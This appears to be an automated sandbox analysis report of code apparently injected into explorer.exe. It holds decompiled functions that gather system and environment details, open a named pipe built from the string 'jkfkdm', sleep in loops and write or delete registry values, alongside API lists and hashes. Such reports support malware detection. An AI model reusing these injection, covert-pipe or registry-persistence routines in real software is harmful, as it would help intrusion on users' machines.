0x0151ec07
0x0151ec0a
0x0151ec0a
0x0151ec0c
0x00000000
0x00000000
0x0151ec0e
0x0151ec23
0x0151ec23
0x0151ed29
0x0151ed4f
0x0151ed6a
0x0151ed87
0x0151eda2
0x0151edc3
0x0151edd7
0x0151edf1
0x0151ee04
0x0151ee15
0x0151ee1f
0x0151ee3e
0x0151ee5b
0x0151ee65
0x0151ee75
0x0151ee84
0x0151ee89
0x0151ee92
0x0151ee98
0x0151ee98
0x0151ee9a
0x00000000
0x00000000
0x0151ee9c
0x0151eea9
0x0151eeb4
0x0151eebe
0x0151eede
0x0151eee4
0x0151eeec
0x0151eefb
0x0151eefc
0x0151ef01
0x0151ef07
0x0151ef0e
0x0151ef0e
0x0151ef10
0x00000000
0x00000000
0x0151ef12
0x0151ef22
0x0151ef28
0x0151ef2a
0x0151ef34
0x0151ef34
0x0151ef36
0x00000000
0x00000000
0x0151ef38
0x0151ef2c
0x0151ef2c
0x0151ef2c
0x0151ef2e
0x00000000
0x00000000
0x0151ef30
0x0151ef32
0x0151ef3a
0x0151ef4b
0x0151ef51
0x0151ef53
0x0151ef55
0x0151ef55
0x0151ef57
0x00000000
0x00000000
0x0151ef59
0x0151ef5e
0x0151ef5e
0x0151ef6a
0x0151ef6a
0x0151ef83
0x0151ef89
0x0151ef8b
0x0151ef8d
0x0151ef8d
0x0151ef8f
0x00000000
0x00000000
0x0151ef91
0x0151ef93
0x0151efb5
0x0151efba
0x0151efc0
0x0151efc0
0x0151efcc
0x0151efcc
0x0151efe6
0x0151efec
0x0151efee
0x0151eff0
0x0151eff0
0x0151eff2
0x00000000
0x00000000
0x0151eff4
0x0151eff9
0x0151eff9
0x0151f005
0x0151f005
0x0151f019
0x0151f01f
0x0151f021
0x0151f023
0x0151f023
0x0151f025
0x00000000
0x00000000
0x0151f027
0x0151f033
0x0151f033
0x0151f039
0x0151f054
0x0151f087
0x0151f094
0x0151f0a1
0x0151f0a9
0x0151f0a9
0x0151f0ab
0x00000000
0x00000000
0x0151f0ad
0x0151f0bd
0x0151f0c4
0x0151f0cc
0x0151f0cc
0x0151f0ce
0x00000000
0x00000000
0x0151f0d0
0x0151f0d5
0x0151f0d8
0x0151f0da
0x0151f0e2
0x0151f0e8
0x0151f0e8
0x0151f0ea
0x00000000
0x00000000
0x0151f0ec
0x0151f0e8
0x0151f0ee
0x0151f0f6

APIs

GetCurrentProcessId.KERNEL32 ref: 0151EA8F
GetTickCount.KERNEL32(?), ref: 0151EAA8
GetModuleFileNameW.KERNEL32(00000000,?,00000105), ref: 0151EAD1
GetCurrentProcess.KERNEL32 ref: 0151EB00
LookupAccountSidW.ADVAPI32(00000000,?,?,00000080,?,00000080,?), ref: 0151EBC3
GetLastError.KERNEL32 ref: 0151EBCD
lstrcpynW.KERNEL32(?,00000000,0000020A), ref: 0151EC23
lstrcpynW.KERNEL32(?,00000000,00000105), ref: 0151EC59
GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 0151ED0C
lstrcpynW.KERNEL32(?,00000000,?,00000040), ref: 0151ED4F
lstrlenW.KERNEL32(?,?,00000040), ref: 0151ED5F
lstrcpynW.KERNEL32(?,?,00000105,?,?,?,?,?,?,00000040), ref: 0151EDC3
lstrcatW.KERNEL32(?,0152A3BC,?,?,?,?,?,?,00000040), ref: 0151EDD7
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000040), ref: 0151EDF1
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,00000040), ref: 0151EE15
lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 0151EE5B
GetCurrentProcess.KERNEL32 ref: 0151EE7D
GetVersionExA.KERNEL32(?), ref: 0151EEBE
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0151EECE
GetProcAddress.KERNEL32(00000000), ref: 0151EED5
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0151EF22
GetEnvironmentVariableW.KERNEL32(SystemRoot,?,00000104), ref: 0151EF4B
SetEnvironmentVariableW.KERNEL32(SystemRoot,?), ref: 0151EF6A
GetEnvironmentVariableW.KERNEL32(USERPROFILE,?,00000209), ref: 0151EF83
SetEnvironmentVariableW.KERNEL32(USERPROFILE,?), ref: 0151EFCC
GetEnvironmentVariableW.KERNEL32(TEMP,?,0000020A), ref: 0151EFE6
SetEnvironmentVariableW.KERNEL32(TEMP,?), ref: 0151F005
GetEnvironmentVariableA.KERNEL32(SystemDrive,?,0000003F), ref: 0151F019
SetEnvironmentVariableA.KERNEL32(SystemDrive,0152FA98), ref: 0151F033
GetComputerNameW.KERNEL32(?,0000007F), ref: 0151F054
lstrlenA.KERNEL32(?,00000000,?), ref: 0151F06D

Strings

TEMP, xrefs: 0151EF93
LookupAccountSidW() err %u, xrefs: 0151EBDA
IsWow64Process, xrefs: 0151EEC4
SystemDrive, xrefs: 0151F014, 0151F02E
kernel32, xrefs: 0151EEC9
SystemRoot, xrefs: 0151EF46, 0151EF65
%s\%s, xrefs: 0151EFA2
USERPROFILE, xrefs: 0151EF7E, 0151EFC7
TEMP, xrefs: 0151EFE1, 0151F000

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: EnvironmentVariable$lstrcpyn$CurrentModuleNameProcesslstrcatlstrlen$File$AccountAddressComputerCountDirectoryErrorHandleLastLookupProcTickVersionWindows
String ID: %s\%s$IsWow64Process$LookupAccountSidW() err %u$SystemDrive$SystemRoot$TEMP$TEMP$USERPROFILE$kernel32
API String ID: 2722344402-164610414
Opcode ID: 93e20543b95c1801f07fe3dc9089b3ca14864834c031d9c1e02804a2c28426e9
Instruction ID: 22165d2cb1492a4a615a2aacfbd1a62e629cf6b4b98be17f1d49d22488149669
Opcode Fuzzy Hash: 93e20543b95c1801f07fe3dc9089b3ca14864834c031d9c1e02804a2c28426e9
Instruction Fuzzy Hash: 8F12BFB5A00205ABFB16DF68D846FAA3765FF84348F048528FE0A9F389D775D644CB90

Uniqueness

Uniqueness Score: 100.00%

Function 003F2690, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 207
sleepUNIQUECrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E003F2690(void* __fp0) {
				char _v8;
				struct HINSTANCE__* _v12;
				char _v16;
				char _v20;
				struct HINSTANCE__* _v24;
				char _v28;
				struct HINSTANCE__* _v32;
				struct HINSTANCE__* _v36;
				CHAR* _v40;
				char _v108;
				struct HINSTANCE__* _v112;
				char _t52;
				struct HINSTANCE__* _t54;
				intOrPtr _t56;
				struct HINSTANCE__* _t57;
				struct HINSTANCE__* _t59;
				struct HINSTANCE__* _t60;
				CHAR* _t61;
				struct HINSTANCE__* _t67;
				struct HINSTANCE__* _t70;
				struct HINSTANCE__* _t76;
				struct HINSTANCE__* _t78;
				void* _t102;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t116;

				_t116 = __fp0;
				_v12 = 0;
				_v16 = 0;
				_v24 = 0;
				_v8 = 0;
				_v20 = 0;
				while(0 != 0) {
				}
				 *0x40f6d4 = 0;
				_t52 = E003F84C0( *((intOrPtr*)(0x4117b0 + E003F8A50(0, _t116, 0x4101bc, 0x64, 0x1f4) *  *0x40ffac * 4)),  &_v8,  &_v20); // executed
				_t104 = _t102 + 0x18;
				_v16 = _t52;
				if(_v16 != 0) {
					_t54 = E003F60C0(_v16, _v8, 0);
					_t105 = _t104 + 0xc;
					_v12 = _t54;
					__eflags = _v12;
					if(_v12 != 0) {
						_v32 = 0;
						_v28 = 0;
						E003F8C60();
						_t56 =  *0x41187c; // 0x15a0d91
						_t85 = _v12;
						_t57 = E003F8290(_t116, _v12, _t56,  &_v28, 0, 0, 0);
						_t106 = _t105 + 0x18;
						_v32 = _t57;
						__eflags = _v32;
						if(_v32 == 0) {
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							L17:
							_t59 = E003F93B0(_t85, 0, "jkfkdm"); // executed
							_t107 = _t106 + 8;
							__eflags = _t59;
							if(_t59 != 0) {
								while(1) {
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								L23:
								_v36 = 0;
								_t60 = E003F8FF0(_t85, __eflags, 0x29);
								_t108 = _t107 + 4;
								_v36 = _t60;
								__eflags = _v36;
								if(__eflags == 0) {
									_t61 = E003F8060(_t85, 0x5c4);
									_t109 = _t108 + 4;
									_v40 = _t61;
									while(1) {
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									__eflags = _v40;
									if(_v40 == 0) {
										L36:
										E003F3F10( &_v16, _v8);
										_t110 = _t109 + 8;
										__eflags = _v12;
										if(__eflags != 0) {
											_t85 =  *((intOrPtr*)(_v12 +  *((intOrPtr*)(_v12 + 0x3c)) + 0x50));
											E003F3F10( &_v12,  *((intOrPtr*)(_v12 +  *((intOrPtr*)(_v12 + 0x3c)) + 0x50)));
											_t110 = _t110 + 8; // executed
										}
										E003F2920(_t85, __eflags); // executed
										while(1) {
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
										__eflags = _v24;
										if(__eflags != 0) {
											do {
												Sleep(0x7d0);
												__eflags =  *0x40f6d0;
											} while ( *0x40f6d0 == 0);
											while(1) {
												L57:
												__eflags = 0;
												if(0 == 0) {
													break;
												}
											}
											__eflags = 0;
											return 0;
										} else {
											goto L42;
										}
										while(1) {
											L42:
											_t67 = E003F8FF0(_t85, __eflags, 0x31);
											_t110 = _t110 + 4;
											_v112 = _t67;
											__eflags = _v112;
											if(_v112 != 0) {
												goto L43;
											}
											Sleep(0x7d0); // executed
											__eflags =  *0x40f6d0;
											if(__eflags == 0) {
												continue;
											}
											L47:
											__eflags =  *0x40f6d0;
											if( *0x40f6d0 == 0) {
												E003F1FF0(_t116,  &_v108); // executed
												_t111 = _t110 + 4;
												while(1) {
													_t70 = E003F1DC0(_t85,  &_v108); // executed
													_t111 = _t111 + 4;
													__eflags = _t70;
													if(_t70 < 0) {
														goto L51;
													}
													Sleep(0x3e8); // executed
													__eflags =  *0x40f6d0;
													if( *0x40f6d0 == 0) {
														continue;
													}
													E003F18C0();
													Sleep(0x7d0);
													goto L57;
												}
												while(1) {
													L51:
													__eflags = 0;
													if(0 == 0) {
														break;
													}
												}
												return 1;
											}
											goto L57;
										}
										while(1) {
											L43:
											_t85 = 0;
											__eflags = 0;
											if(0 == 0) {
												break;
											}
										}
										goto L47;
									}
									_t76 = GetModuleHandleA(_v40);
									__eflags = _t76;
									if(_t76 == 0) {
										goto L36;
									} else {
										goto L33;
									}
									while(1) {
										L33:
										_t85 = 0;
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									_v24 = 1;
									goto L36;
								}
								_t78 = E003F3CF0(__eflags, _v36);
								_t109 = _t108 + 4;
								_v24 = _t78;
								while(1) {
									_t85 = 0;
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								goto L36;
							} else {
								goto L18;
							}
							while(1) {
								L18:
								_t85 = 0;
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							goto L23;
						} else {
							goto L12;
						}
						while(1) {
							L12:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_t85 = _v32;
						E003F9230(_v32, _v32, _v28, 0, 1); // executed
						E003F3F10( &_v32, 0);
						_t106 = _t106 + 0x18;
						goto L17;
					} else {
						goto L8;
					}
					while(1) {
						L8:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					return 0;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x003f2690
0x003f2696
0x003f269d
0x003f26a4
0x003f26ab
0x003f26b2
0x003f26b9
0x003f26bd
0x003f26bf
0x003f26f4
0x003f26f9
0x003f26fc
0x003f2703
0x003f271c
0x003f2721
0x003f2724
0x003f2727
0x003f272b
0x003f273a
0x003f2741
0x003f2748
0x003f2757
0x003f275d
0x003f2761
0x003f2766
0x003f2769
0x003f276c
0x003f2770
0x003f279c
0x003f279c
0x003f279e
0x00000000
0x00000000
0x003f27a0
0x003f27a2
0x003f27a9
0x003f27ae
0x003f27b1
0x003f27b3
0x003f27bd
0x003f27bd
0x003f27bf
0x00000000
0x00000000
0x003f27c1
0x003f27c3
0x003f27c3
0x003f27cc
0x003f27d1
0x003f27d4
0x003f27d7
0x003f27db
0x003f27f9
0x003f27fe
0x003f2801
0x003f2804
0x003f2804
0x003f2806
0x00000000
0x00000000
0x003f2808
0x003f280a
0x003f280e
0x003f282b
0x003f2833
0x003f2838
0x003f283b
0x003f283f
0x003f284a
0x003f2853
0x003f2858
0x003f2858
0x003f285b
0x003f2860
0x003f2860
0x003f2862
0x00000000
0x00000000
0x003f2864
0x003f2866
0x003f286a
0x003f28f9
0x003f28fe
0x003f2904
0x003f2904
0x003f290d
0x003f290d
0x003f290d
0x003f290f
0x00000000
0x00000000
0x003f2911
0x003f2913
0x00000000
0x00000000
0x00000000
0x00000000
0x003f2870
0x003f2870
0x003f2872
0x003f2877
0x003f287a
0x003f287d
0x003f2881
0x00000000
0x00000000
0x003f2890
0x003f2896
0x003f289d
0x00000000
0x00000000
0x003f289f
0x003f289f
0x003f28a6
0x003f28ae
0x003f28b3
0x003f28b6
0x003f28ba
0x003f28bf
0x003f28c2
0x003f28c4
0x00000000
0x00000000
0x003f28d8
0x003f28de
0x003f28e5
0x00000000
0x00000000
0x003f28e7
0x003f28f1
0x00000000
0x003f28f1
0x003f28c6
0x003f28c6
0x003f28c6
0x003f28c8
0x00000000
0x00000000
0x003f28ca
0x00000000
0x003f28cc
0x00000000
0x003f28a8
0x003f2883
0x003f2883
0x003f2883
0x003f2883
0x003f2885
0x00000000
0x00000000
0x003f2887
0x00000000
0x003f2889
0x003f2814
0x003f281a
0x003f281c
0x00000000
0x00000000
0x00000000
0x00000000
0x003f281e
0x003f281e
0x003f281e
0x003f281e
0x003f2820
0x00000000
0x00000000
0x003f2822
0x003f2824
0x00000000
0x003f2824
0x003f27e1
0x003f27e6
0x003f27e9
0x003f27ec
0x003f27ec
0x003f27ec
0x003f27ee
0x00000000
0x00000000
0x003f27f0
0x00000000
0x00000000
0x00000000
0x00000000
0x003f27b5
0x003f27b5
0x003f27b5
0x003f27b5
0x003f27b7
0x00000000
0x00000000
0x003f27b9
0x00000000
0x00000000
0x00000000
0x00000000
0x003f2772
0x003f2772
0x003f2772
0x003f2774
0x00000000
0x00000000
0x003f2776
0x003f2780
0x003f2784
0x003f2792
0x003f2797
0x00000000
0x00000000
0x00000000
0x00000000
0x003f272d
0x003f272d
0x003f272d
0x003f272f
0x00000000
0x00000000
0x003f2731
0x00000000
0x003f2733
0x003f2705
0x003f2709
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 003F2814
Sleep.KERNEL32(000007D0), ref: 003F2890
Sleep.KERNEL32(000003E8), ref: 003F28D8
Sleep.KERNEL32(000007D0), ref: 003F28F1
Sleep.KERNEL32(000007D0), ref: 003F28FE

Strings

jkfkdm, xrefs: 003F27A2

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: Sleep$HandleModule
String ID: jkfkdm
API String ID: 3646095425-2652042395
Opcode ID: f2e724ea8f84bcc832ec4f917da6fa010fea9c1f5c636207c9abbdd67019aa22
Instruction ID: b8df508d44dd31825be43968861951dd195a58478c631460662f7930318fc2ab
Opcode Fuzzy Hash: f2e724ea8f84bcc832ec4f917da6fa010fea9c1f5c636207c9abbdd67019aa22
Instruction Fuzzy Hash: FD71A375D0020DDBDF16EBA0D906BBF73B8AB04304F144439E702AA592E7B95A48CBA5

Uniqueness

Uniqueness Score: 100.00%

Function 01505564, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
pipeUNIQUE

Download Yara Rule

C-Code - Quality: 77%

			E01505564(void* __ecx, void* __eflags) {
				void* _v16;
				char _v272;
				void* __esi;
				intOrPtr _t9;
				void* _t11;
				void* _t15;
				signed int _t17;
				void* _t20;
				void* _t21;
				void* _t22;

				_t22 = __ecx;
				E01513C30( &_v272, 0x100, "\\\\.\\pipe\\%ssp", "jkfkdm");
				_t9 = E01513960(_t22, 0x80000); // executed
				 *0x1537988 = _t9;
				if(_t9 != 0) {
					_t11 = E0151DDB0(_t22,  &_v16); // executed
					__eflags = _t11;
					if(_t11 < 0) {
						_v16 = 0;
					}
					__eflags = 0 - _v16;
					asm("sbb eax, eax");
					_t15 = CreateNamedPipeA( &_v272, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v16);
					 *0x153a980 = _t15;
					__eflags = _t15 - 0xffffffff;
					if(_t15 != 0xffffffff) {
						E0151DAB0(_t15); // executed
						_t17 = E01506FC0(0x80000, __eflags, E015053AB, 0, 0, 0); // executed
						asm("sbb eax, eax");
						_t20 = ( ~_t17 & 0x00000004) + 0xfffffffd;
						__eflags = _t20;
						return _t20;
					} else {
						 *0x153a980 = 0;
						_push(0xfffffffe);
						L2:
						_pop(_t21);
						return _t21;
					}
				}
				_push(0xfffffff5);
				goto L2;
			}

0x01505564
0x01505585
0x01505590
0x0150559a
0x015055a1
0x015055ac
0x015055b2
0x015055b4
0x015055b6
0x015055b6
0x015055bb
0x015055c1
0x015055dc
0x015055e2
0x015055e7
0x015055ea
0x015055f7
0x01505604
0x0150560e
0x01505613
0x01505613
0x00000000
0x015055ec
0x015055ec
0x015055f2
0x015055a5
0x015055a5
0x00000000
0x015055a5
0x015055ea
0x015055a3
0x00000000

APIs

Part of subcall function 01513C30: wvnsprintfA.SHLWAPI(?,?,?,00000000,?,?,?,jkfkdm,00000000), ref: 01513C5E
Part of subcall function 01513C30: lstrlenA.KERNEL32(00000000), ref: 01513C82

Part of subcall function 01513960: HeapAlloc.KERNEL32(018E0000,00000008,0152C2F8,?,?,01513A10,015150C5,?,?,015150C6,0152C2F8,00000839), ref: 01513971

CreateNamedPipeA.KERNEL32(?,00080003,00000006,000000FF,00080000,00080000,00000000,?,?,?,?,?,jkfkdm), ref: 015055DC

Part of subcall function 0151DAB0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(0152FA5C,00000001,00000000,00000000), ref: 0151DAFA
Part of subcall function 0151DAB0: GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,00000000,0152FA5C,00000001,00000000,00000000), ref: 0151DB13
Part of subcall function 0151DAB0: SetSecurityInfo.ADVAPI32(00000006,00000006,00000010,00000000,00000000,00000000,00000000), ref: 0151DB31

Strings

jkfkdm, xrefs: 0150556D, 0150556F
\\.\pipe\%ssp, xrefs: 01505574

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Security$Descriptor$AllocConvertCreateHeapInfoNamedPipeSaclStringlstrlenwvnsprintf
String ID: \\.\pipe\%ssp$jkfkdm
API String ID: 2353914694-2621129560
Opcode ID: 4afd94980704506189ccec1ae2332336bbb0fdc4cd7d814c05b4fa2f6eb14e40
Instruction ID: 8f6beba4b540bafe4a29e2b663ad90007db6a5d45462c983903e397781dc14db
Opcode Fuzzy Hash: 4afd94980704506189ccec1ae2332336bbb0fdc4cd7d814c05b4fa2f6eb14e40
Instruction Fuzzy Hash: CD110A73D5021676DB22AABADC0AE9F37ACBBC2634F110765F061EF1C4F664D1448AA0

Uniqueness

Uniqueness Score: 100.00%

Function 0151E5C0, Relevance: 5.2, Strings: 4, Instructions: 167
UNIQUELIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 64%

			E0151E5C0() {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				char _v276;
				signed int _v280;
				char _v284;
				char _t125;
				void* _t159;
				void* _t160;
				void* _t161;

				_v8 = 0;
				_v280 = 0;
				_v276 = 1;
				_v272 = 0x226;
				_v268 = 0;
				_v264 = 0;
				_v260 = 2;
				_v256 = 0x85b;
				_v252 = 0;
				_v248 = 0;
				_v244 = 4;
				_v240 = 0x2b0b;
				_v236 = 0;
				_v232 = 0;
				_v228 = 8;
				_v224 = 0x1f2d;
				_v220 = 0;
				_v216 = 0;
				_v212 = 0x10;
				_v208 = 0x1c66;
				_v204 = 0;
				_v200 = 0;
				_v196 = 0x20;
				_v192 = 0x268a;
				_v188 = 0;
				_v184 = 0;
				_v180 = 0x40;
				_v176 = 0x1a74;
				_v172 = 0;
				_v168 = 0;
				_v164 = 0x80;
				_v160 = 0x1ba7;
				_v156 = 0;
				_v152 = 0;
				_v148 = 0x100;
				_v144 = 0xade;
				_v140 = 0;
				_v136 = 0;
				_v132 = 0x200;
				_v128 = 0x2387;
				_v124 = 0;
				_v120 = 0;
				_v116 = 0x400;
				_v112 = 0x1b1d;
				_v108 = 0;
				_v104 = 0;
				_v100 = 0x800;
				_v96 = 0x2c63;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0x1000;
				_v80 = 0x225f;
				_v76 = 0;
				_v72 = 0;
				_v68 = 0x2000;
				_v64 = 0x1f0f;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0x4000;
				_v48 = 0x279e;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0x8000;
				_v32 = 0x108;
				_v28 = 0;
				_v24 = 0;
				_v280 = 0x10;
				_v8 = 0;
				while(_v8 < _v280) {
					_t125 = E01515350( *((intOrPtr*)(_t159 + (_v8 << 4) - 0x10c)),  *((intOrPtr*)(_t159 + (_v8 << 4) - 0x10c)));
					_t160 = _t160 + 4;
					_v284 = _t125;
					if(_v284 != 0) {
						 *((intOrPtr*)(_t159 + (_v8 << 4) - 0x104)) = E015171A0(_v284, 0x3b, 0, _t159 + (_v8 << 4) - 0x108);
						E01515460( &_v284);
						_t160 = _t160 + 0x14;
					}
					_v8 = _v8 + 1;
				}
				_v12 =  &_v276;
				_v16 = _v280;
				_v20 = 0;
				E0151B400(E0151E4E0,  &_v20); // executed
				_t161 = _t160 + 8;
				if(_v20 != 0) {
					while(0 != 0) {
					}
				} else {
					while(0 != 0) {
					}
				}
				_v8 = 0;
				while(_v8 < _v280) {
					if( *((intOrPtr*)(_t159 + (_v8 << 4) - 0x104)) != 0) {
						E01517530(_t159 + (_v8 << 4) - 0x104, _t159 + (_v8 << 4) - 0x108);
						_t161 = _t161 + 8;
					}
					_v8 = _v8 + 1;
				}
				return _v20;
			}

0x0151e5c9
0x0151e5d0
0x0151e5da
0x0151e5e4
0x0151e5f0
0x0151e5f6
0x0151e5fc
0x0151e606
0x0151e612
0x0151e618
0x0151e61e
0x0151e628
0x0151e634
0x0151e63a
0x0151e640
0x0151e64a
0x0151e656
0x0151e65c
0x0151e662
0x0151e66c
0x0151e678
0x0151e67e
0x0151e684
0x0151e68e
0x0151e69a
0x0151e6a0
0x0151e6a6
0x0151e6b0
0x0151e6bc
0x0151e6c2
0x0151e6c8
0x0151e6d2
0x0151e6de
0x0151e6e4
0x0151e6ea
0x0151e6f4
0x0151e700
0x0151e706
0x0151e70c
0x0151e713
0x0151e71c
0x0151e71f
0x0151e722
0x0151e729
0x0151e732
0x0151e735
0x0151e738
0x0151e73f
0x0151e748
0x0151e74b
0x0151e74e
0x0151e755
0x0151e75e
0x0151e761
0x0151e764
0x0151e76b
0x0151e774
0x0151e777
0x0151e77a
0x0151e781
0x0151e78a
0x0151e78d
0x0151e790
0x0151e797
0x0151e7a0
0x0151e7a3
0x0151e7a6
0x0151e7b0
0x0151e7c2
0x0151e7db
0x0151e7e0
0x0151e7e3
0x0151e7f0
0x0151e819
0x0151e827
0x0151e82c
0x0151e82c
0x0151e7bf
0x0151e7bf
0x0151e837
0x0151e840
0x0151e843
0x0151e853
0x0151e858
0x0151e85f
0x0151e869
0x0151e86d
0x0151e861
0x0151e861
0x0151e865
0x0151e867
0x0151e86f
0x0151e881
0x0151e89a
0x0151e8b8
0x0151e8bd
0x0151e8bd
0x0151e87e
0x0151e87e
0x0151e8c8

Strings

@, xrefs: 0151E6A6
_", xrefs: 0151E755
c,, xrefs: 0151E73F
, xrefs: 0151E684

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: $@$_"$c,
API String ID: 0-851856876
Opcode ID: bd905197a59c1d8390c6127473c02a1ea29f18d93c5d66586f9877c35ef297eb
Instruction ID: 9c9ce99187d7b0c23d1484101db37b0f644d5b87390716ce63991b1e23e29a0e
Opcode Fuzzy Hash: bd905197a59c1d8390c6127473c02a1ea29f18d93c5d66586f9877c35ef297eb
Instruction Fuzzy Hash: 6D81D2B0D0422DDBEB69CF99D9457DEBBF1BB48304F1085AAC50DAB284D7B45A88CF44

Uniqueness

Uniqueness Score: 100.00%

Function 01510C9E, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11
encryptionUNIQUE

Download Yara Rule

C-Code - Quality: 58%

			E01510C9E() {
				signed int _t1;

				_t1 = CryptAcquireContextA(" g[", 0, 0, 1, 0xf0000000); // executed
				asm("sbb eax, eax");
				return  ~( ~_t1) - 1;
			}

0x01510cae
0x01510cb6
0x01510cbb

APIs

CryptAcquireContextA.ADVAPI32( g[,00000000,00000000,00000001,F0000000,01510C5E,?,?,?,?,0150F0D7,YNNN), ref: 01510CAE

Strings

g[, xrefs: 01510CA9

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: AcquireContextCrypt
String ID: g[
API String ID: 3951991833-285862638
Opcode ID: 63b398c64768a755321702cf15a47295aa7b344b41822942ffca02ef24244d27
Instruction ID: 746e7b652ad30a7b1b34c6890045ec87fee2a0cb6a108231e553cc02a90e67c8
Opcode Fuzzy Hash: 63b398c64768a755321702cf15a47295aa7b344b41822942ffca02ef24244d27
Instruction Fuzzy Hash: 59C092303E420A61FE301A749C0BF6021009391F02F300A007202EE0C8C9D060446118

Uniqueness

Uniqueness Score: 100.00%

Function 0151C470, Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 290
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 32%

			E0151C470(void* _a4, WCHAR* _a8, WCHAR* _a12, int _a16, char* _a20, int _a24) {
				void* _v8;
				void* _v12;
				long _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				WCHAR* _v32;
				int _v36;
				CHAR* _v40;
				_Unknown_base(*)()* _v44;
				signed int _v48;
				_Unknown_base(*)()* _v52;
				char _v180;
				char _v184;
				char _v188;
				signed int _t102;
				long _t112;
				CHAR* _t118;
				int _t124;
				int _t126;
				int _t127;
				int _t128;
				int _t133;
				signed int _t135;
				void* _t143;
				int _t158;
				int _t159;
				int _t161;
				void* _t215;
				void* _t217;
				void* _t221;
				void* _t222;

				_v12 = _a4;
				if(_a4 != 0x80000002) {
					L35:
					_t102 = RegOpenKeyExW(_a4, _a8, 0, 2,  &_v8); // executed
					_v16 = _t102;
					if(_v16 == 0) {
						if(_a20 == 0) {
							_v16 = RegDeleteValueW(_v8, _a12);
							if(_v16 == 0) {
								while(0 != 0) {
								}
								L53:
								RegCloseKey(_v8); // executed
								return 0;
							}
							while(0 != 0) {
							}
							RegCloseKey(_v8);
							return 0xfffffffd;
						}
						_t112 = RegSetValueExW(_v8, _a12, 0, _a16, _a20, _a24); // executed
						_v16 = _t112;
						if(_v16 == 0) {
							while(0 != 0) {
							}
							goto L53;
						}
						while(0 != 0) {
						}
						RegCloseKey(_v8);
						return 0xfffffffe;
					}
					while(0 != 0) {
					}
					return _t102 | 0xffffffff;
				}
				_t169 =  *0x1538b3c & 0x0000ffff;
